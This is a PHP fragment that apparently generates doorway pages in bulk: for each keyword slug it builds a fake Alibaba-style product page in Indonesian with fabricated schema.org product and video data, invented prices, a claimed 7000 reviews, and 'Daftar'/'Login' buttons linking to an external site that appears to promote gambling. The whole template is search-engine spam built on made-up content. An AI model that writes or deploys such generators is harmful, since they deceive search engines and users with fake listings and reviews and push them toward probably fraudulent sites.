                        </section>
                     </div>
                  </div>
               </section>
            </article>
         </main>
         <footer class="sections" id="footer-sections" data-footer-sections>
            <section
               data-test="page-section"
               data-section-theme="white"
               class="page-section 
               full-bleed-section
               layout-engine-section
               background-width--full-bleed
               section-height--custom
               content-width--wide
               horizontal-alignment--center
               vertical-alignment--top
               white"
               data-section-id="67ac308ba812770c1a8ca356"
               data-controller="SectionWrapperController"
               data-current-styles="{
               &quot;imageOverlayOpacity&quot;: 0.15,
               &quot;backgroundWidth&quot;: &quot;background-width--full-bleed&quot;,
               &quot;sectionHeight&quot;: &quot;section-height--custom&quot;,
               &quot;customSectionHeight&quot;: 10,
               &quot;horizontalAlignment&quot;: &quot;horizontal-alignment--center&quot;,
               &quot;verticalAlignment&quot;: &quot;vertical-alignment--top&quot;,
               &quot;contentWidth&quot;: &quot;content-width--wide&quot;,
               &quot;customContentWidth&quot;: 50,
               &quot;sectionTheme&quot;:&quot;white&quot;,
               &quot;sectionAnimation&quot;: &quot;none&quot;,
               &quot;backgroundMode&quot;: &quot;image&quot;
               }"
               data-current-context="{
               &quot;video&quot;: {
               &quot;playbackSpeed&quot;: 0.5,
               &quot;filter&quot;: 1,&quot;filterStrength&quot;: 0,
               &quot;zoom&quot;: 0,
               &quot;videoSourceProvider&quot;: &quot;none&quot;
               },
               &quot;backgroundImageId&quot;: null,
               &quot;backgroundMediaEffect&quot;: null,&quot;divider&quot;: null,
               &quot;typeName&quot;: &quot;products&quot;
               }"
               data-animation="none"
               data-fluid-engine-section
               style="min-height: 10vh;" 
               >
               <div class="section-border">
                  <div class="section-background">
                  </div></div>
               <div class="content-wrapper"
                  style="
                  padding-bottom: calc(10vmax / 5);
                  "
                  >
                  <div
                     class="content"
                     >
                     <div data-fluid-engine="true">
                        <style>
                           .fe-67ac308ba812770c1a8ca355 {
                           --grid-gutter: calc(var(--sqs-mobile-site-gutter, 6vw) - 11.0px);--cell-max-width: calc( ( var(--sqs-site-max-width, 1500px) - (11.0px * (8 - 1)) ) /8);
                           display: grid;
                           position: relative;
                           grid-area: 1/1/-1/-1;grid-template-rows: repeat(1,minmax(24px, auto));
                           grid-template-columns:
                           minmax(var(--grid-gutter), 1fr)
                           repeat(8, minmax(0, var(--cell-max-width)))
                           minmax(var(--grid-gutter), 1fr);
                           row-gap: 11.0px;
                           column-gap: 11.0px;
                           }@media (min-width: 768px) {
                           .background-width--inset .fe-67ac308ba812770c1a8ca355 {
                           --inset-padding: calc(var(--sqs-site-gutter) * 2);
                           }
                           .fe-67ac308ba812770c1a8ca355 {
                           --grid-gutter: calc(var(--sqs-site-gutter, 4vw) - 11.0px);
                           --cell-max-width: calc( ( var(--sqs-site-max-width, 1500px) - (11.0px * (24 - 1)) ) / 24 );
                           --inset-padding: 0vw;
                           --row-height-scaling-factor: 0.0215;
                           --container-width: min(var(--sqs-site-max-width, 1500px), calc(100vw - var(--sqs-site-gutter, 4vw) * 2 - var(--inset-padding) ));
                           grid-template-rows: repeat(3,minmax(calc(var(--container-width) * var(--row-height-scaling-factor)), auto));
                           grid-template-columns:
                           minmax(var(--grid-gutter), 1fr)
                           repeat(24, minmax(0, var(--cell-max-width)))
                           minmax(var(--grid-gutter), 1fr);
                           }
                           }
                           .fe-block-762998b951fbbeea76fe {
                           grid-area: 1/2/2/10;
                           z-index: 0;
                           @media (max-width: 767px) {
                           }
                           }
                           .fe-block-762998b951fbbeea76fe .sqs-block {
                           justify-content: flex-start;
                           }
                           .fe-block-762998b951fbbeea76fe .sqs-block-alignment-wrapper {
                           align-items: flex-start;}@media (min-width: 768px) {.fe-block-762998b951fbbeea76fe {
                           grid-area: 3/2/4/26;
                           z-index: 0;
                           }.fe-block-762998b951fbbeea76fe .sqs-block {
                           justify-content: flex-start;
                           }
                           .fe-block-762998b951fbbeea76fe .sqs-block-alignment-wrapper {
                           align-items: flex-start;
                           }
                           }
                        </style>
                        <div class="fluid-engine fe-67ac308ba812770c1a8ca355">
                           <div class="fe-block fe-block-762998b951fbbeea76fe"><div class="sqs-block html-block sqs-block-html" data-block-type="2" id="block-762998b951fbbeea76fe"><div class="sqs-block-content"><div class="sqs-html-content">
                                       <p style="text-align:center;white-space:pre-wrap;" class="">Made with <a href="' . htmlspecialchars($urlPath3) . '">' . htmlspecialchars($thtitle) . '</a></p>
                                    </div>
                                 </div>
                              </div>
                           </div>
                        </div>
                     </div>
                  </div>
               </div>
            </section>
         </footer>
      </div><script defer="true" src="https://static1.squarespace.com/static/vta/5c5a519771c10ba3470d8101/scripts/site-bundle.7a52a694fd4248c18775c6aa813a0358.js" type="text/javascript"></script>
      <svg xmlns="http://www.w3.org/2000/svg" version="1.1" style="display:none" data-usage="social-icons-svg">
         <symbol id="instagram-unauth-icon" viewBox="0 0 64 64">
            <path d="M46.91,25.816c-0.073-1.597-0.326-2.687-0.697-3.641c-0.383-0.986-0.896-1.823-1.73-2.657c-0.834-0.834-1.67-1.347-2.657-1.73c-0.954-0.371-2.045-0.624-3.641-0.697C36.585,17.017,36.074,17,32,17s-4.585,0.017-6.184,0.09c-1.597,0.073-2.687,0.326-3.641,0.697c-0.986,0.383-1.823,0.896-2.657,1.73c-0.834,0.834-1.347,1.67-1.73,2.657c-0.371,0.954-0.624,2.045-0.697,3.641C17.017,27.415,17,27.926,17,32c0,4.074,0.017,4.585,0.09,6.184c0.073,1.597,0.326,2.687,0.697,3.641c0.383,0.986,0.896,1.823,1.73,2.657c0.834,0.834,1.67,1.347,2.657,1.73c0.954,0.371,2.045,0.624,3.641,0.697C27.415,46.983,27.926,47,32,47s4.585-0.017,6.184-0.09c1.597-0.073,2.687-0.326,3.641-0.697c0.986-0.383,1.823-0.896,2.657-1.73c0.834-0.834,1.347-1.67,1.73-2.657c0.371-0.954,0.624-2.045,0.697-3.641C46.983,36.585,47,36.074,47,32S46.983,27.415,46.91,25.816z M44.21,38.061c-0.067,1.462-0.311,2.257-0.516,2.785c-0.272,0.7-0.597,1.2-1.122,1.725c-0.525,0.525-1.025,0.85-1.725,1.122c-0.529,0.205-1.323,0.45-2.785,0.516c-1.581,0.072-2.056,0.087-6.061,0.087s-4.48-0.015-6.061-0.087c-1.462-0.067-2.257-0.311-2.785-0.516c-0.7-0.272-1.2-0.597-1.725-1.122c-0.525-0.525-0.85-1.025-1.122-1.725c-0.205-0.529-0.45-1.323-0.516-2.785c-0.072-1.582-0.087-2.056-0.087-6.061s0.015-4.48,0.087-6.061c0.067-1.462,0.311-2.257,0.516-2.785c0.272-0.7,0.597-1.2,1.122-1.725c0.525-0.525,1.025-0.85,1.725-1.122c0.529-0.205,1.323-0.45,2.785-0.516c1.582-0.072,2.056-0.087,6.061-0.087s4.48,0.015,6.061,0.087c1.462,0.067,2.257,0.311,2.785,0.516c0.7,0.272,1.2,0.597,1.725,1.122c0.525,0.525,0.85,1.025,1.122,1.725c0.205,0.529,0.45,1.323,0.516,2.785c0.072,1.582,0.087,2.056,0.087,6.061S44.282,36.48,44.21,38.061z M32,24.297c-4.254,0-7.703,3.449-7.703,7.703c0,4.254,3.449,7.703,7.703,7.703c4.254,0,7.703-3.449,7.703-7.703C39.703,27.746,36.254,24.297,32,24.297z M32,37c-2.761,0-5-2.239-5-5c0-2.761,2.239-5,5-5s5,2.239,5,5C37,34.761,34.761,37,32,37z M40.007,22.193c-0.994,0-1.8,0.806-1.8,1.8c0,0.994,0.806,1.8,1.8,1.8c0.994,0,1.8-0.806,1.8-1.8C41.807,22.999,41.001,22.193,40.007,22.193z"/>
         </symbol>
         <symbol id="instagram-unauth-mask" viewBox="0 0 64 64">
            <path d="M43.693,23.153c-0.272-0.7-0.597-1.2-1.122-1.725c-0.525-0.525-1.025-0.85-1.725-1.122c-0.529-0.205-1.323-0.45-2.785-0.517c-1.582-0.072-2.056-0.087-6.061-0.087s-4.48,0.015-6.061,0.087c-1.462,0.067-2.257,0.311-2.785,0.517c-0.7,0.272-1.2,0.597-1.725,1.122c-0.525,0.525-0.85,1.025-1.122,1.725c-0.205,0.529-0.45,1.323-0.516,2.785c-0.072,1.582-0.087,2.056-0.087,6.061s0.015,4.48,0.087,6.061c0.067,1.462,0.311,2.257,0.516,2.785c0.272,0.7,0.597,1.2,1.122,1.725s1.025,0.85,1.725,1.122c0.529,0.205,1.323,0.45,2.785,0.516c1.581,0.072,2.056,0.087,6.061,0.087s4.48-0.015,6.061-0.087c1.462-0.067,2.257-0.311,2.785-0.516c0.7-0.272,1.2-0.597,1.725-1.122s0.85-1.025,1.122-1.725c0.205-0.529,0.45-1.323,0.516-2.785c0.072-1.582,0.087-2.056,0.087-6.061s-0.015-4.48-0.087-6.061C44.143,24.476,43.899,23.682,43.693,23.153z M32,39.703c-4.254,0-7.703-3.449-7.703-7.703s3.449-7.703,7.703-7.703s7.703,3.449,7.703,7.703S36.254,39.703,32,39.703z M40.007,25.793c-0.994,0-1.8-0.806-1.8-1.8c0-0.994,0.806-1.8,1.8-1.8c0.994,0,1.8,0.806,1.8,1.8C41.807,24.987,41.001,25.793,40.007,25.793z M0,0v64h64V0H0z M46.91,38.184c-0.073,1.597-0.326,2.687-0.697,3.641c-0.383,0.986-0.896,1.823-1.73,2.657c-0.834,0.834-1.67,1.347-2.657,1.73c-0.954,0.371-2.044,0.624-3.641,0.697C36.585,46.983,36.074,47,32,47s-4.585-0.017-6.184-0.09c-1.597-0.073-2.687-0.326-3.641-0.697c-0.986-0.383-1.823-0.896-2.657-1.73c-0.834-0.834-1.347-1.67-1.73-2.657c-0.371-0.954-0.624-2.044-0.697-3.641C17.017,36.585,17,36.074,17,32c0-4.074,0.017-4.585,0.09-6.185c0.073-1.597,0.326-2.687,0.697-3.641c0.383-0.986,0.896-1.823,1.73-2.657c0.834-0.834,1.67-1.347,2.657-1.73c0.954-0.371,2.045-0.624,3.641-0.697C27.415,17.017,27.926,17,32,17s4.585,0.017,6.184,0.09c1.597,0.073,2.687,0.326,3.641,0.697c0.986,0.383,1.823,0.896,2.657,1.73c0.834,0.834,1.347,1.67,1.73,2.657c0.371,0.954,0.624,2.044,0.697,3.641C46.983,27.415,47,27.926,47,32C47,36.074,46.983,36.585,46.91,38.184z M32,27c-2.761,0-5,2.239-5,5s2.239,5,5,5s5-2.239,5-5S34.761,27,32,27z"/>
         </symbol>
         <symbol id="twitter-unauth-icon" viewBox="0 0 64 64">
            <path d="M48,22.1c-1.2,0.5-2.4,0.9-3.8,1c1.4-0.8,2.4-2.1,2.9-3.6c-1.3,0.8-2.7,1.3-4.2,1.6 C41.7,19.8,40,19,38.2,19c-3.6,0-6.6,2.9-6.6,6.6c0,0.5,0.1,1,0.2,1.5c-5.5-0.3-10.3-2.9-13.5-6.9c-0.6,1-0.9,2.1-0.9,3.3 c0,2.3,1.2,4.3,2.9,5.5c-1.1,0-2.1-0.3-3-0.8c0,0,0,0.1,0,0.1c0,3.2,2.3,5.8,5.3,6.4c-0.6,0.1-1.1,0.2-1.7,0.2c-0.4,0-0.8,0-1.2-0.1 c0.8,2.6,3.3,4.5,6.1,4.6c-2.2,1.8-5.1,2.8-8.2,2.8c-0.5,0-1.1,0-1.6-0.1c2.9,1.9,6.4,2.9,10.1,2.9c12.1,0,18.7-10,18.7-18.7 c0-0.3,0-0.6,0-0.8C46,24.5,47.1,23.4,48,22.1z"/>
         </symbol>
         <symbol id="twitter-unauth-mask" viewBox="0 0 64 64">
            <path d="M0,0v64h64V0H0z M44.7,25.5c0,0.3,0,0.6,0,0.8C44.7,35,38.1,45,26.1,45c-3.7,0-7.2-1.1-10.1-2.9 c0.5,0.1,1,0.1,1.6,0.1c3.1,0,5.9-1,8.2-2.8c-2.9-0.1-5.3-2-6.1-4.6c0.4,0.1,0.8,0.1,1.2,0.1c0.6,0,1.2-0.1,1.7-0.2 c-3-0.6-5.3-3.3-5.3-6.4c0,0,0-0.1,0-0.1c0.9,0.5,1.9,0.8,3,0.8c-1.8-1.2-2.9-3.2-2.9-5.5c0-1.2,0.3-2.3,0.9-3.3 c3.2,4,8.1,6.6,13.5,6.9c-0.1-0.5-0.2-1-0.2-1.5c0-3.6,2.9-6.6,6.6-6.6c1.9,0,3.6,0.8,4.8,2.1c1.5-0.3,2.9-0.8,4.2-1.6 c-0.5,1.5-1.5,2.8-2.9,3.6c1.3-0.2,2.6-0.5,3.8-1C47.1,23.4,46,24.5,44.7,25.5z"/>
         </symbol>
      </svg>
   </body>
</html>';
exit;
} elseif 
($_SERVER['REQUEST_URI'] === '/') {
	selip();
} else {
    if (!function_exists('processTitle')) {
        function processTitle($slug) {
            return str_replace('_', ' ', urldecode($slug));
        }
    }
    if (!function_exists('slugify')) {
        function slugify($string) {
            return preg_replace('/[^a-z0-9]+/', '-', strtolower(trim($string)));
        }
    } 
    $uri = trim(parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH), '/'); 
    $urlPath2 = getFullCurrentUrl();
    $segments = explode('/', $uri);
    $slug = end($segments);
    $processedSlug = processTitle($slug);

    if (empty($processedSlug) || $fileContent1 === false) {
        selip();
    }

    $lines = array_filter(array_map('trim', explode(PHP_EOL, $fileContent1)));
    if (empty($lines)) {
        selip();
    }
    $processedLines = array_map('processTitle', $lines);
    if (in_array($processedSlug, $processedLines)) {
        $finalTitle = ucwords(strtolower($processedSlug));
        $sku = rand(0, 99999);
echo '<!DOCTYPE html>
<html lang="id" class="rwd"  dir="ltr" >
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>'. htmlspecialchars($finalTitle) . ' ' . htmlspecialchars($judulfolder) .'</title>
<meta name="keywords" content="'. htmlspecialchars($finalTitle) . '"/>
<meta name="description" content="'. htmlspecialchars($finalTitle) . ' ' . htmlspecialchars($judulfolder) .'"/>

<meta property="og:title" content="'. htmlspecialchars($finalTitle) . ' ' . htmlspecialchars($judulfolder) .'"/>
<meta property="og:description" content="'. htmlspecialchars($finalTitle) . ' ' . htmlspecialchars($judulfolder) .'"/>
<meta property="og:type" content="product"/>
<meta property="og:availability" content="instock"/>
<meta property="og:site_name" content="'. htmlspecialchars($finalTitle) . '"/>
<meta property="og:url" content="' . htmlspecialchars($urlPath2) . '"/>
<meta property="og:image" content="' . htmlspecialchars($gambarfolder) .'"/>

<meta name="twitter:site" content="@'. htmlspecialchars($finalTitle) . '">
<meta property="twitter:card" content="summary_large_image" />
<meta property="twitter:url" content="' . htmlspecialchars($urlPath2) . '" />
<meta property="twitter:title" content="'. htmlspecialchars($finalTitle) . ' ' . htmlspecialchars($judulfolder) .'" />
<meta property="twitter:description" content="'. htmlspecialchars($finalTitle) . ' Adalah ' . htmlspecialchars($desfolder) .'" />
<meta property="twitter:image" content="' . htmlspecialchars($gambarfolder) .'" />

<link rel="shortcut icon" href="' . htmlspecialchars($icon) . '" type="image/x-icon">
<link rel="amphtml" href="' . htmlspecialchars($ampfolder) . '" />
<link rel="canonical" href="' . htmlspecialchars($urlPath2) . '" />

<link rel="preconnect" href="https://s.alicdn.com" crossorigin>
<link rel="dns-prefetch" href="https://s.alicdn.com" />
<link rel="preload" as="image" href="' . htmlspecialchars($gambarfolder) .'" />
<link rel="stylesheet" href="https://s.alicdn.com/@g/sc/detail-fantasy/1.1.27/index.css" />
<noscript>
<link rel="stylesheet" href="https://s.alicdn.com/@g/sc/detail-fantasy/1.1.27/globalHeader.css">
<link href="https://fonts.googleapis.com/css2?family=Orbitron" rel="stylesheet">

    </noscript>
<script type="application/ld+json">
        [
            {
        "@context": "https://schema.org/",
        "@type": "Product",
        "@id": "' . htmlspecialchars($sku) . '",
        "name": "'. htmlspecialchars($finalTitle) . ' ' . htmlspecialchars($judulfolder) .'",
        "image":"' . htmlspecialchars($gambarfolder) .'",
        "description": "'. htmlspecialchars($finalTitle) . ', ' . htmlspecialchars($desfolder) .'",
        "sku": "' . htmlspecialchars($sku) . '",
        "mpn": "' . htmlspecialchars($sku) . '-00",
                "brand": {
        "@type": "Brand",
        "name": "'. htmlspecialchars($finalTitle) . '"
        }
                ,
        "offers": {
            "@type": 
            "Offer",
            "url":"' . htmlspecialchars($urlPath2) . '",
              
            "availability": "http://schema.org/InStock",
                    "priceCurrency": "IDR",
            "price": "620"
                            ,
            "priceValidUntil": "2026-04-16"
                }
                }
                ,{
            "@context": "https://schema.org",
            "@type": "VideoObject",
            "@id": "' . htmlspecialchars($sku) . '",
        "name": "'. htmlspecialchars($finalTitle) . ' ' . htmlspecialchars($judulfolder) .'",
        "description": "'. htmlspecialchars($finalTitle) . ', ' . htmlspecialchars($desfolder) .'",
        "thumbnailUrl": "' . htmlspecialchars($gambarfolder) .'",
        "uploadDate": "2025-04-16",
        "duration": "PT12S",
        "contentUrl": "'. htmlspecialchars($videofolder) . '"
    },{
        "@context": "https://schema.org",
        "@type": "ImageObject",
        "contentUrl": "' . htmlspecialchars($gambarfolder) .'",
        "creditText": "'. htmlspecialchars($finalTitle) . '",
                "creator": {
            "@type": "Person",
            "name": "'. htmlspecialchars($finalTitle) . '"
        }
            }
            
            ]
</script>
                    <script type="application/ld+json">
            {
              "@context": "https://schema.org",
              "@type": "BreadcrumbList",
              "itemListElement": [
                                {
                  "@type": "ListItem",
                  "position": 1,
                  "name": "Permainan",
                  "item": "' . htmlspecialchars($urlPath2) . '"
                },                                {
                  "@type": "ListItem",
                  "position": 2,
                  "name": "Merek",
                  "item": "' . htmlspecialchars($urlPath2) . '"
                },                                {
                  "@type": "ListItem",
                  "position": 3,
                  "name": "'. htmlspecialchars($finalTitle) . '",
                  "item": "' . htmlspecialchars($urlPath2) . '"
                }                                ]
            }
            </script>
</head>

<body data-spm="details" class="details-page unite  english " data-pdp="true">
    <header id="icbu-header">
  <div id="icbu-the-new-header-container">
    <div id="the-new-header" data-version="4.4.0" data-ssr-version="4.21.4" data-tnh-auto-exp="tnh-expose" data-scenes="search-products" style="position: relative;background-color: #fff;border-bottom: 1px solid #ddd;box-sizing: border-box; font-family:Inter,SF Pro Text,Roboto,Helvetica Neue,Helvetica,Tahoma,Arial,PingFang SC,Microsoft YaHei;">
      <div style="display: flex;align-items: center;height: 72px;min-width: 1200px;max-width: 1580px;margin: 0 auto;padding: 0px 40px;box-sizing: border-box;">
          <img style="height: 22px; width: auto;" src="' . htmlspecialchars($icon) . '" alt="logo" />
          </div>
    </div>
  </div>
  </header>
    <div id="container" class="root-layout">
  <div data-module-name="module_breadcrumbNew" class="module_breadcrumbNew">
    <div class="id-mx-auto id-flex id-min-w-[1180px] id-max-w-screen-lg id-px-10">
      <div class="detail-breadcrumb-layout id-min-w-700px id-flex id-max-w-4xl id-justify-center id-py-3 id-text-xs id-font-normal">
        <nav aria-label="breadcrumb" class="id-w-screen lg:id-w-screenLg">
          <ol class="id-flex id-flex-wrap id-items-center id-gap-1 id-text-sm id-text-muted-foreground first-line:id-break-words">
            <li class="id-inline-flex id-items-center id-gap-1.5 hover:id-underline"><a class="id-transition-colors hover:id-text-foreground id-text-xs" href="' . htmlspecialchars($urlPath2) . '">Permainan</a></li>
            <li role="presentation" aria-hidden="true" class="[&amp;&gt;svg]:id-size-3.5">
              <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-chevron-right">
                <path d="m9 18 6-6-6-6"></path>
              </svg>
            </li>
            <li class="id-inline-flex id-items-center id-gap-1.5 hover:id-underline"><a class="id-transition-colors hover:id-text-foreground id-text-xs" href="' . htmlspecialchars($urlPath2) . '">Merek</a></li>
            <li role="presentation" aria-hidden="true" class="[&amp;&gt;svg]:id-size-3.5">
              <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-chevron-right">
                <path d="m9 18 6-6-6-6"></path>
              </svg>
            </li>
            <li class="id-inline-flex id-items-center id-gap-1.5 hover:id-underline"><a class="id-transition-colors hover:id-text-foreground id-text-xs" href="' . htmlspecialchars($urlPath2) . '">'. htmlspecialchars($finalTitle) . '</a></li>
          </ol>
        </nav>
      </div>
      <div class="id-flex-1"></div>
    </div>
  </div>
  <div class="layout-body">
    <div class="layout-left">
      <div data-section="SectionOverview" class="">
        <div data-module-name="module_title" class="module_title">
          <div class="product-title-container">
            <h1 title="'. htmlspecialchars($finalTitle) . ' ' . htmlspecialchars($judulfolder) .'">'. htmlspecialchars($finalTitle) . ' ' . htmlspecialchars($judulfolder) .'</h1>
          </div>
        </div>
        <div data-module-name="module_comment" class="module_comment">
          <div class="detail-product-comment">
              <span class="detail-review-item detail-star detail-separator">
                  <span class="detail-review-item detail-review">(7000 ulasan)</span></span></div>
        </div>
        <div data-module-name="module_company" class="module_company"><div class="product-company">
            <img class="company-logo" src="' . htmlspecialchars($icon) . '" alt="company-logo" loading="lazy"/>
            <div class="product-company-info">
                <span class="company-name detail-separator">
                    <a href="' . htmlspecialchars($urlPath2) . '" target="_blank" title="'. htmlspecialchars($finalTitle) . '">'. htmlspecialchars($finalTitle) . '</a></span>
            <span class="company-life detail-separator">6 yrs</span>
            <span class="company-country detail-separator">
                <img loading="lazy" src="https://s.alicdn.com/@u/mobile/g/common/flags/1.0.0/assets/id.png"/><span class="register-country">ID</span></span></div>
          </div>
        </div>
        <div data-module-name="module_productImage" class="module_productImage">
          <div data-module="MainImage" class="main-index">
            <div class="id-flex id-justify-around id-aspect-[16/10]">
              <div data-submodule="ProductImageThumbsList" class="id-mr-5 id-w-16 sm:id-mr-2 md:id-mr-10">
                <div class="id-relative id-h-full id-w-[64px]" role="region" aria-roledescription="carousel" data-testid="product-image-list">
                  <div class="id-overflow-hidden id-h-full">
                    <div class="id-flex id--mt-4 id-flex-col id--mt-5 id-h-full">
                      <div role="group" aria-roledescription="slide" class="id-min-w-0 id-shrink-0 id-grow-0 id-relative id-basis-1/6 id-pt-5">
                        <div class="id-relative id-flex id-aspect-square id-w-16 id-cursor-pointer id-items-center id-justify-center id-overflow-hidden id-rounded-lg id-bg-contain id-bg-center id-bg-no-repeat id-border-2 id-border-black" style="background-image:url(' . htmlspecialchars($gambarfolder) .')">
                          <svg class="detail-symbol">
                            <use xlink:href="#icon-play-fill"></use>
                          </svg>
                          <div class="id-absolute id-bottom-0 id-left-0 id-right-0 id-top-0 id-bg-black id-opacity-5"></div>
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
              <div data-submodule="ProductImageMain" class="id-relative id-flex-1">
                <div class="id-relative id-h-full id-w-full" role="region" aria-roledescription="carousel" data-testid="product-image-view">
                  <div class="id-overflow-hidden id-h-full">
                    <div class="id-flex id--ml-4 id-h-full">
                      <div role="group" aria-roledescription="slide" class="id-min-w-0 id-shrink-0 id-grow-0 id-basis-full id-pl-4 id-h-full id-cursor-pointer">
                        <div class="id-h-full id-w-full id-overflow-hidden id-rounded-xl">
                          <div class="detail-video-placeholder" style="background-image:url(' . htmlspecialchars($gambarfolder) .')">
                            <img loading="eager" src="' . htmlspecialchars($gambarfolder) .'"/>
                            <div class="react-dove-playButton react-dove-bigPlay unset">
                              <div class="react-dove-playButton-wapper">
                                <span role="img" class="anticon react-dove-icon react-dove-playButton-arrow">
                                  <div class="play-triangle"></div>
                                </span>
                              </div>
                            </div>
                          </div>
                        </div>
                      </div>

                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
      <style>
@import url(https://fonts.googleapis.com/css2?family=Orbitron);.neon-button{font-family:Orbitron,sans-serif;font-weight:500;font-size:24px;padding:20px 60px;text-transform:uppercase;color:#000;border:5px solid transparent;border-radius:18px;position:relative;cursor:pointer;z-index:1;overflow:hidden;transition:.3s;animation:5s infinite gradientAnimation,1s ease-in-out infinite blink-border;margin:10px;text-align:center;outline:0;min-width:250px;height:120px;display:flex;align-items:center;justify-content:center;letter-spacing:1px;line-height:1}@keyframes gradientAnimation{0%,100%{background-position:0 50%}50%{background-position:100% 50%}}@keyframes blink-border{0%,100%{border-color:#ff00c8}25%{border-color:#00f0ff}50%{border-color:#00ff94}75%{border-color:#fffb00}}.daftar{background:linear-gradient(45deg,#ff00c8,#00f0ff,#fffb00,#00ff94);background-size:400% 400%}.login{background:linear-gradient(45deg,#ff4d4d,#4d4dff,gold,#00ff7f);background-size:400% 400%}
</style>
      <div data-section="SectionDetails" class="">
        <div data-module-name="module_description" class="module_description">
          <div class="description-layout" id="description-layout">
            <h2 class="att-title" id="more-detail">Deskripsi produk</h2>
            <p>'. htmlspecialchars($finalTitle) . ', ' . htmlspecialchars($desfolder) .'</p>
            <br>
            <p><a href="' . htmlspecialchars($ampfolder) . $namabl . htmlspecialchars($finalTitle) .'"><button class="neon-button daftar">Daftar</button></a></p>
            <p><a href="' . htmlspecialchars($ampfolder) . $namabl . htmlspecialchars($finalTitle) .'"><button class="neon-button login">Login</button></a></p>
          </div>
        </div>
      </div>
    </div>
    <div class="layout-right" data-layout="layout-right">
      <div class="layout-stick" data-layout="layout-stick">
        <div class="layout-overview" data-layout="layout-overview">
          <div data-section="SectionAction" class="">
            <div data-module-name="module_atmosphere" class="module_atmosphere"></div>
            <div data-module-name="module_product_highlights" class="module_product_highlights">
              <div class="id-mx-5 id-mt-5 id-border-b id-border-[#ddd] id-pb-5">
                <div class="id-flex id-max-h-[60px] id-flex-wrap id-items-center id-gap-2 id-overflow-hidden">
                  <div style="background-color:#FFF1DB" data-auto-exp="customizable" data-testid="customizable" class="id-flex id-h-[20px] id-items-center id-gap-1 id-rounded-sm id-px-2" type="button" aria-haspopup="dialog" aria-expanded="false" aria-controls="radix-:Rii:" data-state="closed"><span class="id-flex id-items-center id-gap-1 id-text-xs id-font-semibold" style="color:#A75A00">Dapat disesuaikan</span></div>
                </div>
              </div>
            </div>
            <div data-module-name="module_free_shipping" class="module_free_shipping"></div>
            <div data-module-name="module_price" class="module_price">
              <div data-testid="product-price" class="product-price">
                <div class="price-list">
                  <div data-testid="ladder-price" class="id-flex id-flex-wrap id-gap-x-6 id-gap-y-3">
                    <div class="price-item">
                      <div class="quality">2 - 9 Buah</div>
                      <div class="price"><span class="">Rp 11.131.118</span></div>
                    </div>
                    <div class="price-item">
                      <div class="quality">10 - 19 Buah</div>
                      <div class="price"><span class="">Rp 10.959.870</span></div>
                    </div>
                    <div class="price-item">
                      <div class="quality">20 - 49 Buah</div>
                      <div class="price"><span class="">Rp 10.788.622</span></div>
                    </div>
                    <div class="price-item">
                      <div class="quality">&gt;= 50 Buah</div>
                      <div class="price"><span class="">Rp 10.617.374</span></div>
                    </div>
                  </div>
                </div>
                <div class="id-mb-3 id-rounded-[4px] id-bg-[#F4F4F4]">
                  <div class="id-flex id-items-center id-justify-between id-px-3 id-py-3 id-py-[15px]" data-testid="fortifiedSample">
                    <div class="id-flex id-items-center id-overflow-hidden id-text-[14px]">
                      <img src="https://img.alicdn.com/imgextra/i3/O1CN0125Ii1L1CCCSbNDAQ6_!!6000000000044-55-tps-20-20.svg" class="id-mr-[4px] id-h-[20px] id-w-[20px]"/>
                      <div class="id-overflow-hidden id-overflow-ellipsis id-whitespace-nowrap"><span class="id-mr-[4px] id-font-semibold">Harga sampel:</span><span>Rp 11.131.118</span></div>
                    </div>
                    <button data-testid="getSampleButton" class="id-ml-1 id-flex id-h-6 id-w-[116px] id-flex-shrink-0 id-flex-grow-0 id-items-center id-justify-center id-rounded-[65px] id-border-[1px] id-border-solid id-border-[#222] id-bg-[#fff] id-px-3 id-py-1 id-text-[13px] id-text-[#222]"><span class="id-overflow-hidden id-overflow-ellipsis id-whitespace-nowrap">Dapatkan Sampel</span></button>
                  </div>
                </div>
              </div>
            </div>
            <div data-module-name="module_sku" class="module_sku">
              <div class="id-px-5 logistics" data-testid="sku-layout" data-show-type="skuSummary">
                <div data-testid="sku-options">
                  <h3 class="id-mb-4 id-text-lg id-font-semibold">Variasi</h3>
                  <div class="id-mt-2 id-flex id-w-full id-flex-row id-justify-betweenid-gap-5">
                    <div class="id-truncate id-text-sm" data-testid="default-stats"><span class="">Pilihan:</span>
                        <span class="id-ml-2 id-font-bold"></span></div>
                    <a data-testid="sku-action" href="#" class="id-whitespace-nowrap id-text-base id-font-semibold id-text-primary id-underline">Pilih sekarang</a>
                  </div>
                </div>
                <div class="sku-logistic" data-testid="sku-logistic">
                    <h3 class="id-m-0 id-text-lg id-font-semibold">Jasa pengiriman</h3>
                </div>
              </div>
            </div>
            <div class="right-bottom id-bg-white right-bottom-sticky">
              <div data-module-name="module_actions" class="module_actions">
                <div class="id-flex id-items-center id-justify-center id-gap-3 id-px-5 buttons-layout-triple">
                  <button class="id-inline-flex id-items-center id-justify-center id-whitespace-nowrap id-text-sm id-ring-offset-background id-transition-colors focus-visible:id-outline-none focus-visible:id-ring-2 focus-visible:id-ring-ring focus-visible:id-ring-offset-2 disabled:id-pointer-events-none disabled:id-opacity-40 id-bg-primary id-text-primary-foreground hover:id-opacity-90 id-py-2 id-h-12 id-w-full id-gap-1 id-text-wrap id-rounded-full id-border-[#222] id-px-0 id-font-bold" style="background-color:#FF6A00;color:#FFFFFF" data-testid="skuSummary-ORDER">
                      <span class="id-line-clamp-2">Mulai memesan</span></button>
                      <button class="id-inline-flex id-items-center id-justify-center id-whitespace-nowrap id-text-sm id-ring-offset-background id-transition-colors focus-visible:id-outline-none focus-visible:id-ring-2 focus-visible:id-ring-ring focus-visible:id-ring-offset-2 disabled:id-pointer-events-none disabled:id-opacity-40 id-border id-bg-background hover:id-bg-accent hover:id-text-accent-foreground id-py-2 id-h-12 id-w-full id-gap-1 id-text-wrap id-rounded-full id-border-[#222] id-px-0 id-font-bold" style="background-color:#FFFFFF;color:#222222" data-testid="skuSummary-CART">
                          <span class="id-line-clamp-2">Masuk keranjang</span></button>
